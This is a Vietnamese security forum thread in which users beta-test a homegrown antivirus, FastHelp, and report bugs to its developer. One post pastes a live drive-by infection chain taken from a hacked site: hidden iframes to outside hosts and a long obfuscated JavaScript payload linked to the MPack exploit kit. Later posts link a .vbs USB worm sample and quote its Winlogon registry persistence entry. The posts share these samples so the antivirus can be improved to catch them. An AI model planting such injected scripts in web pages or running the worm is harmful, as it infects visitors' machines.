[Question] Thử nghiệm chương trình diệt Virus mới |
15/07/2007 01:49:54 (+0700) | #181 | 71217 |
|
tmd
Member
|
0 |
|
|
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
|
|
Mới mở mail ỳa hố ra coi, thấy liền một cái mail có link của tibs, quả là vắn số. Cái vụ này là phong trào rồi, kể từ khi nhận được con tibs đầu tiên. |
|
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ... |
|
|
|
[Question] Thử nghiệm chương trình diệt Virus mới |
26/07/2007 22:06:54 (+0700) | #182 | 74036 |
|
nlfb
Journalist
|
0 |
|
|
Joined: 09/07/2003 16:41:21
Messages: 1175
Location: HCM
Offline
|
|
Hix em lại gặp vấn đề với FH rồi, sáng nay vô mở máy thì FH bảo cập nhật, thế nhưng bị treo, phải khởi động lại (2 lần). Em nghĩ là anh Hoàng nên làm 1 bản update offline (kiểu như của Symantec á), trong đó tổng hợp các update từ trước đến nay, vì đâu phải ai cũng có internet. ) |
|
|
|
|
[Question] Thử nghiệm chương trình diệt Virus mới |
27/07/2007 10:59:18 (+0700) | #183 | 74210 |
|
Bí Danh NJ
Member
|
0 |
|
|
Joined: 24/07/2007 07:38:21
Messages: 111
Location: Một nơi nào đó
Offline
|
|
MOD Hoàng ơi.
Cái Soft chạy ổn - quyét rất đc việc - Có điều nó quyét chương trình chạy lâu quá - Ngồi chờ nó mỏi cổ mà quyét chưa xong để chạy Game.Bỏ nó đi Game chạy tốt.Hic,pác kiếm cách nào nó bóp cổ nhẹ nhẹ một tí chứ bóp kiểu này tịt luôn quá ( |
|
|
|
|
[Question] Thử nghiệm chương trình diệt Virus mới |
27/07/2007 11:53:14 (+0700) | #184 | 74233 |
LeVuHoang
HVA Friend
|
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
|
|
@nolateforbegin:L Chỉ cần chép đè file Data.dat lên là đủ, chỉ khi nào upgrade kernel thì mới cần cài lại thôi
@Bí Danh NJ: Theo thử nghiệm của Hoàng thì chương trình quét nhanh hơn BKAV mà T.A ? Chỉ có điều là nếu cần chạy các game như Boom, PTV gì đó thì nên exit trước khi chạy. Đang kiếm cách khắc phục lỗi này đây |
|
|
|
|
[Question] Re: Thử nghiệm chương trình diệt Virus mới |
27/07/2007 12:31:09 (+0700) | #185 | 74246 |
|
KyNam
Member
|
0 |
|
|
Joined: 15/07/2007 01:37:35
Messages: 74
Offline
|
|
chào LeVuHoang , muốn dùng thử mà không cài được :
Code:
Runtime error (at 1:624):
SWbemObjectEx : the service cannot be started
thử đổi priority thành thấp để chạy được trong lúc các chương trình khác đang chạy |
|
|
|
|
[Question] Thử nghiệm chương trình diệt Virus mới |
27/07/2007 13:33:14 (+0700) | #186 | 74254 |
LeVuHoang
HVA Friend
|
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
|
|
hi KyNam,
Hoàng đã test từ WinMe -> WinVista nhưng chưa gặp lỗi như bạn nói và cũng không có sử dụng service nào mang tên SWbemObjectEx.
Còn về priority thì đã sử dụng thread nên các tiến trình khác vẫn hoạt động bình thường. |
|
|
|
|
[Question] Re: Thử nghiệm chương trình diệt Virus mới |
27/07/2007 20:47:35 (+0700) | #187 | 74286 |
|
KyNam
Member
|
0 |
|
|
Joined: 15/07/2007 01:37:35
Messages: 74
Offline
|
|
thử cài trên win xp thì được
chắc là lỗi của innosetup |
|
|
|
|
[Question] Thử nghiệm chương trình diệt Virus mới |
28/07/2007 05:51:24 (+0700) | #188 | 74471 |
LeVuHoang
HVA Friend
|
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
|
|
biết lỗi rồi, đó là do Windows 2k và 2k3 không có System Restore thì phải. Hoàng sẽ bỏ chức năng này ở version sau. Thank KyNam |
|
|
|
|
[Question] Re: Thử nghiệm chương trình diệt Virus mới |
28/07/2007 06:29:38 (+0700) | #189 | 74480 |
doikengheo
HVA Friend
|
Joined: 31/05/2005 05:51:51
Messages: 486
Location: Đâu nhỉ?
Offline
|
|
Lão Hoàng coi lại chứ khi cài Fasthelp thì không chạy được bản update của vỏ lâm truyền kỳ á |
|
Đi một ngày đàng học một sàng dại
Sàng đi sàng lại lấy một tí khôn
http://vietload.com
kho phần mềm trực tuyến |
|
|
|
[Question] Thử nghiệm chương trình diệt Virus mới |
28/07/2007 06:52:16 (+0700) | #190 | 74484 |
LeVuHoang
HVA Friend
|
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
|
|
lạ thật, sao nó toàn gặp rắc rối với mấy cái game ). Giải pháp tạm thời là exit chương trình rồi chạy game lên |
|
|
|
|
[Question] Re: Thử nghiệm chương trình diệt Virus mới |
28/07/2007 10:29:14 (+0700) | #191 | 74527 |
vnn1980
Member
|
0 |
|
|
Joined: 14/05/2007 16:42:30
Messages: 12
Offline
|
|
Con này dùng cũng được lắm. làm thế nào mà tụ độngáyấy dữ liệu từ các trang trực tuyến thì tốt |
|
|
|
|
[Question] Thử nghiệm chương trình diệt Virus mới |
28/07/2007 14:03:53 (+0700) | #192 | 74598 |
|
Bí Danh NJ
Member
|
0 |
|
|
Joined: 24/07/2007 07:38:21
Messages: 111
Location: Một nơi nào đó
Offline
|
|
Tạm thời trong thời gian chờ đợi MOD Hoàng Update cái bản khác test game nhẹ nhẹ hơn ) yêu cầu anh em đọc kỹ hướng dẫn sử dụng : NHỚ TẮT CHƯƠNG TRÌNH TRƯỚC KHI CHẠY GAME - BẬT LẠI KHI VÀO WEB ĐEN ( |
|
|
|
|
[Question] Thử nghiệm chương trình diệt Virus mới |
31/07/2007 07:26:53 (+0700) | #193 | 75193 |
bgate
Member
|
0 |
|
|
Joined: 18/06/2007 16:33:29
Messages: 21
Offline
|
|
hic anh Hoàng ơi chiều này máy nhà em update cái Fasthelp và quét,được một lúc thì nó báo lỗi:"external exception C0000024".
ah,còn 1 vấn đề nữa là hồi đầu khi cài fasthelp nếu bật bitdefender 10 thì không cài được còn nếu tắt đi thì cài được
|
|
|
|
|
[Question] Thử nghiệm chương trình diệt Virus mới |
02/08/2007 05:09:12 (+0700) | #194 | 75856 |
|
Bí Danh NJ
Member
|
0 |
|
|
Joined: 24/07/2007 07:38:21
Messages: 111
Location: Một nơi nào đó
Offline
|
|
Giống như là chế độ ưu tiên khi cài đặt.Tắt hết các chương trình có khả năng scan đi thì mới cài đc. )
Mod Hoàng mới nhận một số dự án mới và đang gấp rút hoàn thành bản mới của Lion nên trả lời hơi lâu thì phải, có gì anh em thông cảm ) |
|
|
|
|
[Question] Re: Thử nghiệm chương trình diệt Virus mới |
02/08/2007 11:40:31 (+0700) | #195 | 76003 |
MH
Member
|
0 |
|
|
Joined: 15/04/2007 00:16:17
Messages: 10
Offline
|
|
Anh Hoàng ơi, thế cái FH này nó disable hết tất cả các file Autorun.inf à? Em nhét cái đĩa CD vào nhưng chả autorun được, đành exit cái FH đi.
Mà mấy hôm nay em update mãi vẫn 5.3.4. Có lỗi gì ko anh? Hay anh chưa upgrade? |
|
|
|
|
[Question] Re: Thử nghiệm chương trình diệt Virus mới |
02/08/2007 12:09:24 (+0700) | #196 | 76022 |
|
tmd
Member
|
0 |
|
|
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
|
|
Chào mod Hoàng, tình cờ tui chui vào cái diễn đàn DDTH.com tả pín lù. Tui thấy có người hỏi về trang web cá nhân của họ bị dính một cái đoạn code, đại loại như
<iframe src='http://xxx.yyy.zzz.aaa/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
Sau đó tui lại tò mò download từ từ các file .php từ cái địa chỉ xyz đó về máy để coi thử nội dung, tui lại thấy một file index.php có nội dung
<iframe src="http://bbb.ccc.ddd.eee/go.php?sid=1" style="border:0px solid gray;" WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
Tiếp tục download tiếp cái file go.php đó ra coi, tui thấy một file index.php khác có chứa một dòng mã, mà tui đã thấy qua 1 lần.
<script language=JavaScript>function decipher(x)var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,8,55,5,58,30,38,22,7,29,0,0,0,0,0,0,37,59,23,2,56,13,60,15,39,11,36,21,32,62,9,53,52,10,48,34,49,6,45,35,27,12,3,0,0,0,0,31,0,0,1,50,43,42,16,28,41,4,61,24,25,40,17,54,19,57,26,47,46,14,51,44,18,20,33);for(j=Math.ceil(l/b);j>0;j--)r='';for(i=Math.min(l,b);i>0;i--,l--)w|=(t[x.charCodeAt(p++)-48])<<s;if(s)r+=String.fromCharCode(165^w&255);w>>=8;s-=2elses=6document.write(r)decipher("3S4dlo5FmHM6mMr6VZuqzsNes6lFw8_4LslDaWwc37ETCZg6QUGATHuDXS4dlekALp5DXS4dl5t4zv_z78E2NZY68UYv7B9civjHIdFca_D6mMQes6NTKB9ca89zi_VTEvFPaWqzE89PK0hSQoN@IcNJIxlJgtD@xemcn2wS1X9@7xN@IMYTB_kzUdgRa_YT7ZY68ogPnBjHQekHyt1Hft1@ncqSBQhSQ89v87mTQ8YRk5kFiAYRO_EvpvgcaIYR7smTNpwO7_kzxvgRn2Y6y7kzEZYvC2gPkxq6mMr6KpFOiWgzIpYcaWqzmdgRfHYROpgPE_kzppgcfZY68ogPnBjHQekHyt1Hft1@ncqSBQhSQ89vQQYRnskOEBV6QB9Pk6wci8FzXS4dle1TKB9ca8j6mMQes6lDwG_zY8Y685GR1dgPad_AQX9P8tlvn89O_emS9xqSgCqSyUNHI5hJQegPEdmRa8jSK2gOregOnWlcQpgRlekDwG06mMQes6hj6_GAO8_zNpFcCZETCZY68u0qoXFOYB9P8tNes7kz3S4d37kz37kz6dFc789z7XjRWdM4TXG6B7Nes7kz37kz37kz37kz3S4d37kz37kzzvYc37mc28tjmMrz37kz37kDYWgz3eg0mH5AT8_jmMrz37kz37kDYWgz3eFDodues7kz37kz3Uuv1BkzQIsjEZgcNW4d37kz37kzzvYc37mco2YRNHYqKB9zmMrz37kz371es7kz37kz3Uuv1BkzcvFczvFOmMrz37kz37kDYWgz3C52asuT1ZYes7kz37kz3Uuv1BkzjW54HdgRgW4d37kz37kzzvYc37kjNZVRYsFDYHYRmMrz37kz37kDYWgz3rFqg8ERmMrz37kz37kDYWgz3eMTGsuT1ZYes7kz37kz3Uuv1Bkze_FvO_VcCW4dmMrz37kz37kDYWgz3SuP78ED9ZwTf8ERbW4dmMrz371AZBDciGEvCpgPQ_jSiB9OdpYcaWqzmvwTBdwOQGgP3cMcnZFOIZgP3C52KHwcBZFO87kFEZFcmMQes7kz37kz3SuP78ED9ZwTf8ERbB1637lzmMQes7kz37kz3StcbZ9cad_ji89vk5GR1dgPad_AQX9PIcFcIZFOTZg2nW4d37kz37kzcvFceXG6SZgP4IGvId0Fa_VOYdFcmMrz371es7kz37kz3rGRNZwTnBmqiXER3QGvIdtj3S4d37kz37kz37kz37kz3ruT7Zgz8cNJ871es7kz37kz37kz37kz37kz3714fX9PL2ERUZ9Pa8Y6yS4d37kz37kz37kz37kz3ruT7Zgz8t5F8S4d37kz37kz37kz37kz37kz3SuP78ED9ZwTf8ERbWN@mMrz37kz37kz37kz37kz6pwOaBDzgoqzmMrz37kz37kz37kz37kz37kzmZVOnZ52aXYPnZgRkxNes7kz37kz37kz37kz37mqiXER3514L_1es7kz37kz37kz37kz37kz3714fX9PL2ERUZ9Pa8Y6yS4d37kz37kz37kz37kz3ruT7ZgzLHwOaW4d37kz37kz37kz37kz37kz3SuP78ED9ZwTf8ERbWl@37kzmMrz37kz371DI8gzoZgcaXgPmMrz3S4d37kz37kzwGgz3SuP78ED9ZwTf8ERbWN@3U_vasYes7kz37kz37kz37kz2pFcbdYcY0ERmMQes7kz37kz37kz37kzL2ERdpYcaWhDasYRBpgPasuT1ZgWYS4d37kz37kz37kz371D9ZF4iWYRkC52asuT1ZgzZ7DzICg2a_1es71es7kz37kz37kz37kzoZgP37mc28tjkUwcUZEcasgPIrFOapgPaZ5caWYRI89W8eFTGZwTn_1W3S4d37kz37kz37kz37mc28tjIrERnp5Pn_Ev8Z9PaBDzY8FzN5mc28tj8S4d37kz37kz37kz37mc28tjIrERnp5Pn_Ev8Z9PaBDzUHYT7XEvb_kS8rgc7vgR_55DguhqfCqJ1uNJJXNSyxlDKS1H9rNq17l@6BlJWXM@gCt@p51es7kz37kz3S4d37kz37kz37kz37mja89zQX_vaHgcJB9O3SlzQ__DosmqBZYTnZw480YRU89W8r_vaHgcIx5OKHYvUpgPYdFc86Dz8c1es7kz37kz37kz37kzoZgP3eFDQHgRa_9zk7mco2YRNHYqKBjSdpYcaX_OiXYRErVOZGt4d8sjYS4d37kz37kz37kz37mja89zQGtcN8YRBv5PaWY6QGtcN8YRBskji_VOasuT1ZgW8rG21_wcNskPnGFzYS4d37kz37kz37kz37DDQsgP4BGTn2wM6dYcKdFcasgP7WhjKHYvn2mcWdgcbZFOw8ER1skji89vN5kM861Sy61@YS4d37kz37kz37kz37mFYsgDY_E63utcI8VMOpgPEdsqQWgOQsYRI8VOE7NW3ukz860z3ukz3utcI8VMOpgPEdsqQWgOQsYRI8VOExNW3ukz860zmMrz37kz37kz37kz3C52asuT1ZY6cvFczvFO3ukzL2ERdpYcaW4d37kz37kz37kz37kz37kz37kzmMrz37kz37kz37kz3eMTGsuT1ZY68SuvU_Vc7dFRn_1es7kz37kz37kz37kze_FvO_VcCWqzjW54V8_FO_1es7kz37kz37kz37kz7ZgP3eg0mH5AT8_j3Slz6_ERi8ERe_FvaXgPEeMTGsuT1ZgzZ7DzI5kzZ7m480gjBdwRYS4d37kz37kz37kz37DjapVMnv9OaWqzS_kzZ7DzL_kzZ7DzT_1es7kz37kz37kz37kzV8_FOXGR7XEvQsY6Q2G4h25FTB0SeBERI2DjapVMTv9OaH14Q8YPNZwMOpgPEHk@YS4d37kz37kz37kz37mcjW54V8_FOsmjasgREckzmMrz37kz37kz37kz3eMc3CMOBdFO35GR7ZEcaBD4a29PmMrz37kz37kz37kz3oG4h_tcbvE6Q2G4h25FTB0SBZwOKdFc7ZFqQ8Y2mMrzmMrz37kz37kz37kz3utjed0ciWYRk5mjU_EvK8EvIIFz3ukz8tDz3ukz8uuvNZwjgX9PaWw480YRU8jzmMrz37kz37kz37kz3rGRnBmcWXs4keFjzX0S6_ERi8ERe_FvaXgPEutjed0ciWYRN5DzYS4d37kz37kz37kz37mja89zOHYPCvFcWvgcaWhcWXs4IrMOapgPa8GR98jDYHYREC52asuT1ZgS3U0jRZuWmMrz37kz37kz37kz37_cfIYvIdsOY0ERk6uRI_5WjW54HdgRgv1esS4d37kz37kz37kz37DDQ_9zGWN@3Usc37_cfIYvIdsOY0ER3S4d37kz37kz37kz37kz37kz3rFqg8ERkSuvb_5WjW54HdgRgHDvNxNWmMrz37kz37kz37kz37kz37kzHv9PaXtcbZY6JXVTH2mTHv9Pav1es7kz37kz37kz37kz37kz37kjNZVRYsFDYHYRIQ0OY8EREr5vB2Dqg8ER6dgRav1WmMrz37kz37kz37kz3tuR98Ees7kz37kz37kz37kzOHYPCvFcWvgcasmqNdwOaW4d37kz37kz3S4d37kz37kz37kz37mja89z3ewFo2YRNHY6Q__DosmqBZYTnZw480YRU89W8QsjU_EvK8jSo2YRNHFzN5DzYS4d37kz37kz37kz37m4IB1DB_VcBBDjaXEP1ZgzdZg2nW4d37kz37kz37kz37mccX_vaHgcI5GPIBkWL2ERdpYcavkSy6DDJHtjLW4dmMrz37kz371DI8gzwGgzmMQes7kz3CMcbB1AZW4dmM4DfswTnvwcIBmDa8VMcvFc4GGRBXEvQsgWYS4dmMrz37kz3cuDpZFO7vwcIWqciGEvCpgPQ_jSiB9OvZFO7vwcIW4d37kz371AZB1AIX_PB21ALGERBXEvQsgS8QGvI8wcxX9zgCqzY7k6X7k@37kFEZFcmMrz37kz37kz3QuRndsFYswMvZFO7vwcIWqzgCqzmMrz37kz3C5c7ZYAZB1AIX_PB21ALGERBXEvQsgS8QGvI8wcxX9zd8_zn51W36q637lz3U_vasYes7kz37kz37kzSZgP4IGvId0Fa_VOYdFck5D4T_1es7kz37kzLHwOavMR3cMco8jOEcuDpZFO7vwcIHDzcvFc3cl23UqSg51W36q637lz3U_vasYes7kz37kz37kzSZgP4IGvId0Fa_VOYdFck514L_1es7kz37kzLHwOavMR3cMco8jOEcuDpZFO7vwcIHDzcvFcbdwP7B1H951W36q637lz3U_vasYes7kz37kz37kzSZgP4IGvId0Fa_VOYdFck51H951es7kz37kzLHwOavMR3cMco8jOEcuDpZFO7vwcIHDzcvFcbdwP7BD4TB1JI7qzY7k6X7k@37kFEZFcmMrz37kz37kz3QuRndsFYswMvZFO7vwcIWqzB4MzmMrz37kz3C5c7ZYAZB1AIX_PB21ALGERBXEvQsgS8QGvI8wcxX9zd8_zft1@8ckzltlzK7kzT2YRIW4d37kz37kz37mDa8VMcvFc4GGRBXEvQsY68o_j8S4d37kz371DNXER3S4d37kz37kz37mDa8VMcvFc4GGRBXEvQsY68C0cuswcxsFzmMrz37kz3CMcbB1AZW4d37kz371esCMcbBDDfswTnvwcIW4dmM4DfswTnvwcIBmDasYRBpgPasuT1ZgWYS4dmMrz37kz35GTI8wc1suT1ZY6851es7kz37kzB_E6wsgPEoqW2sgRYS4d37kz371vuWl@mMrz37kz3UtcmMrz37kz37kz3cYvkcMcn2D@fMDjI8YWuchJmMrz37kz37kz35GTI8wc1suT1ZY62pFcbdYcdpYcaAmqE_9WYvYWmMrz37kz37kz3cwvkcwvuxNes7kz37kzhdwcKBmFEvgcaB1vuHqOBW4d37kz37mDasYRBpgPasuT1ZY62pFcbdYcdpYcaW4dmMQDI8gzWZjcU8EvQsYes7kz3S4dlemj6_GAO806mMr6Q5t4zv06mMr6Qo5FmHM6mMQ")</script>
Tới ngang đây, do giới hạn hiểu biết, tui không biết cái thông tin gì được lấy về từ một nơi nào đó trên internet .... Thông tin hack này từ lần trước khi hỏi mod về mpack, cách thức người tấn công sử dụng mpack nhét thêm vào source code của trang web....
Vậy mod có cải tiến chức năng của phần mềm FH để luột, ngăn không thực hiện cái đoạn code của mpack, cái đoạn code thực thi các index.php, go.php, ...
Các phần mềm diệt malware khác đều detect ra cái file index.php có chứa cái đoạn kinh dị trên.
Tui chưa tìm hiểu nhiều về lập trình,lập trình ngôn ngữ web, bà con và mod thông cảm.
|
|
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ... |
|
|
|
[Question] Thử nghiệm chương trình diệt Virus mới |
02/08/2007 14:52:31 (+0700) | #197 | 76070 |
LeVuHoang
HVA Friend
|
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
|
|
|
|
[Question] Thử nghiệm chương trình diệt Virus mới |
02/08/2007 22:44:18 (+0700) | #198 | 76126 |
|
nlfb
Journalist
|
0 |
|
|
Joined: 09/07/2003 16:41:21
Messages: 1175
Location: HCM
Offline
|
|
Hi, em tải về dùng bản 5.3.5 rồi nhưng có cái lỗi "kỳ kỳ" ), thứ nhất là phải add updater của boom vào (cái này ko sao), nhưng em ghi CD 2 cái software xong chạy nó thì không được (chưa thử cái khác), nó chỉ hiện ra 1 cửa sổ explorer mới trỏ đến ổ CD nữa. Em đoán là do cái FH nên tắt thử thì chạy bình thường, hay là tại anh đặt sờ-cu-ri-ty hơi cao ) |
|
|
|
|
[Question] Thử nghiệm chương trình diệt Virus mới |
03/08/2007 03:22:17 (+0700) | #199 | 76222 |
LeVuHoang
HVA Friend
|
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
|
|
nolateforbegin wrote:
Hi, em tải về dùng bản 5.3.5 rồi nhưng có cái lỗi "kỳ kỳ" ), thứ nhất là phải add updater của boom vào (cái này ko sao), nhưng em ghi CD 2 cái software xong chạy nó thì không được (chưa thử cái khác), nó chỉ hiện ra 1 cửa sổ explorer mới trỏ đến ổ CD nữa. Em đoán là do cái FH nên tắt thử thì chạy bình thường, hay là tại anh đặt sờ-cu-ri-ty hơi cao )
Ah, là do trên đĩa CD của nolateforbegin có autorun.inf để tự chạy chứ gì ? nolateforbegin vào phần Cấu Hình, chọn mục Khi có một ứng dụng AutoPlay thực thi. Đặt lại chế độ cho phép hoặc hỏi người dùng mỗi khi autorun.inf được chạy.
Hoàng làm chức năng này để chống mấy loại malware lây qua đường flash drive. Khi gắn Flash Drive vào, nếu malware được thực thi thì chương trình sẽ báo. |
|
|
|
|
[Question] Thử nghiệm chương trình diệt Virus mới |
03/08/2007 12:41:57 (+0700) | #200 | 76388 |
|
tmd
Member
|
0 |
|
|
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
|
|
Mod nên hoang nên update luôn chức năng ngăn chạy các loại .js .vbs .reg .... nói chung các loại code thuộc nhóm script, registry value. Tui vừa thử chạy một cái code độc .vbs. Nó chạy tuốt luốt. May một cái là FH của mod để lại cái warn là có thay đổi tại registry key. Nên đặt ra warn cho các loại script này luôn.
Nó đây http://www.freefileupload.net/file.php?file=files/020807/1186072814/killVBS.rar
Y chang một loại worm bình thường, lây lan tè le qua usb. Loại .vbs này hiện tại nhiều lắm, chưa kể các loại .js... khác.
PS : cái key này nó thêm vào registry. FH của mod ghi nhận được.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit=C:\WINDOWS\system32\userinit.exe, -> C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\wscript.exe C:\WINDOWS\system32\killVBS.vbs
|
|
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ... |
|
|
|
[Question] Thử nghiệm chương trình diệt Virus mới |
03/08/2007 13:44:34 (+0700) | #201 | 76401 |
LeVuHoang
HVA Friend
|
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
|
|
hmm... add vào db thì dĩ nhiên là chương trình sẽ nhận dạng được. Nhưng làm sao phân biêt được script nào là người dùng tạo và script nào là có hại hả tmd ? Chẳng lẽ... cấm hết ? |
|
|
|
|
[Question] Thử nghiệm chương trình diệt Virus mới |
03/08/2007 23:23:58 (+0700) | #202 | 76467 |
LeVuHoang
HVA Friend
|
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
|
|
Sao cái link của tmd Hoàng cố down từ hôm qua đến giờ mà cứ bị lỗi không down được. |
|
|
|
|
[Question] Re: Thử nghiệm chương trình diệt Virus mới |
04/08/2007 07:25:51 (+0700) | #203 | 76624 |
|
tmd
Member
|
0 |
|
|
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
|
|
Upload lại cái link, ý là mod nên cho hỏi yes,no khi user nào đó chạy script gi vào registry, hỏi yes/no có cho ghi cái gì đó vào registry không. Vụ này có thiệt hại đó. Nâng cao thôi, bình thường để mặt định là không hỏi.
http://w13.easy-share.com/2702441.html có pass |
|
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ... |
|
|
|
[Question] Thử nghiệm chương trình diệt Virus mới |
05/08/2007 00:44:09 (+0700) | #204 | 76843 |
|
nlfb
Journalist
|
0 |
|
|
Joined: 09/07/2003 16:41:21
Messages: 1175
Location: HCM
Offline
|
|
Hi anh, 2 cái đó không có autorun, em chép theo dạng nguyên 2 cái thư mục: 1 là share point designer từ file iso ra nên có file autorun trong đó, thư mục còn lại là Kingsoft Office, không có autorun, hổng hiểu ( |
|
|
|
|
[Question] Re: Thử nghiệm chương trình diệt Virus mới |
05/08/2007 06:40:09 (+0700) | #205 | 76899 |
|
tmd
Member
|
0 |
|
|
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
|
|
Đúng là phải nhập code nhiều lần , nó mới cho download cái file.
http://www.freefileupload.net/file.php?file=files/040807/1186223983/killVBS.rar |
|
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ... |
|
|
|
[Question] Thử nghiệm chương trình diệt Virus mới |
05/08/2007 12:14:09 (+0700) | #206 | 76947 |
LeVuHoang
HVA Friend
|
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
|
|
nolateforbegin wrote:
Hi anh, 2 cái đó không có autorun, em chép theo dạng nguyên 2 cái thư mục: 1 là share point designer từ file iso ra nên có file autorun trong đó, thư mục còn lại là Kingsoft Office, không có autorun, hổng hiểu (
hi nolateforbegin,
Bạn thử tắt chế độ "Khi có một ứng dụng AutoRun" thực thi xem sao ? Nếu vẫn còn bị, bạn có thể upload file .iso đó lên không ? Nếu upload thì Hoàng sẽ setup 1 FTP cho bạn ? |
|
|
|
|
[Question] Thử nghiệm chương trình diệt Virus mới |
11/08/2007 22:51:19 (+0700) | #207 | 78430 |
|
YHT
Member
|
0 |
|
|
Joined: 21/04/2006 13:29:33
Messages: 173
Location: HCM
Offline
|
|
Anh Hoàng ơi,
Anh có thể thêm một tính năng AutoUpdate được không? Vì hiện tại nó có check những mỗi lần tải về lại hỏi người dùng, anh thêm một option cho nó tự down khỏi hỏi luôn nhé .
Vì triển khai một dàn mấy chục máy mà nó update lại hỏi thì hơi kẹt.
--YHT |
|
|
|
|
[Question] Thử nghiệm chương trình diệt Virus mới |
12/08/2007 05:27:21 (+0700) | #208 | 78488 |
LeVuHoang
HVA Friend
|
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
|
|
ok, sẽ add . thank YHT |
|
|
|
|
[Question] Re: Thử nghiệm chương trình diệt Virus mới |
14/08/2007 05:47:09 (+0700) | #209 | 78699 |
NMH1505
Member
|
0 |
|
|
Joined: 03/08/2007 11:56:56
Messages: 6
Offline
|
|
Mình sử dụng rồi !! Xin cho phép nhận xét nhé :
1. Quét tốt một số loại Virus Việt Nam .
2. Chưa thể mơ lock những khóa tron registry : task Manager , Regedit , Msconfig ... ( Nếu thêm đc những chức năng này thì khá tốt ).
Nếu có thêm thông tin gì mình sẽ send mẫu cho !! xin ủng hộ 2 tay 2 chân ... |
|
|
|
|
[Question] Thử nghiệm chương trình diệt Virus mới |
14/08/2007 12:14:43 (+0700) | #210 | 78772 |
LeVuHoang
HVA Friend
|
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
|
|
2. Chưa thể mơ lock những khóa tron registry : task Manager , Regedit , Msconfig ... ( Nếu thêm đc những chức năng này thì khá tốt ).
Có công cụ All Tools In One kèm theo đó bạn. Cho phép mở Task Manager, Regedit...
Đối với loại virus nào khoá Task Manager, Regedit... chương trình sẽ tự động unlock ra.
Nếu có thêm thông tin gì mình sẽ send mẫu cho !! xin ủng hộ 2 tay 2 chân ...
Thank bạn trước |
|
|
Users currently in here |
1 Anonymous
|
|
Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 ©
v2012|0504|218|
|
|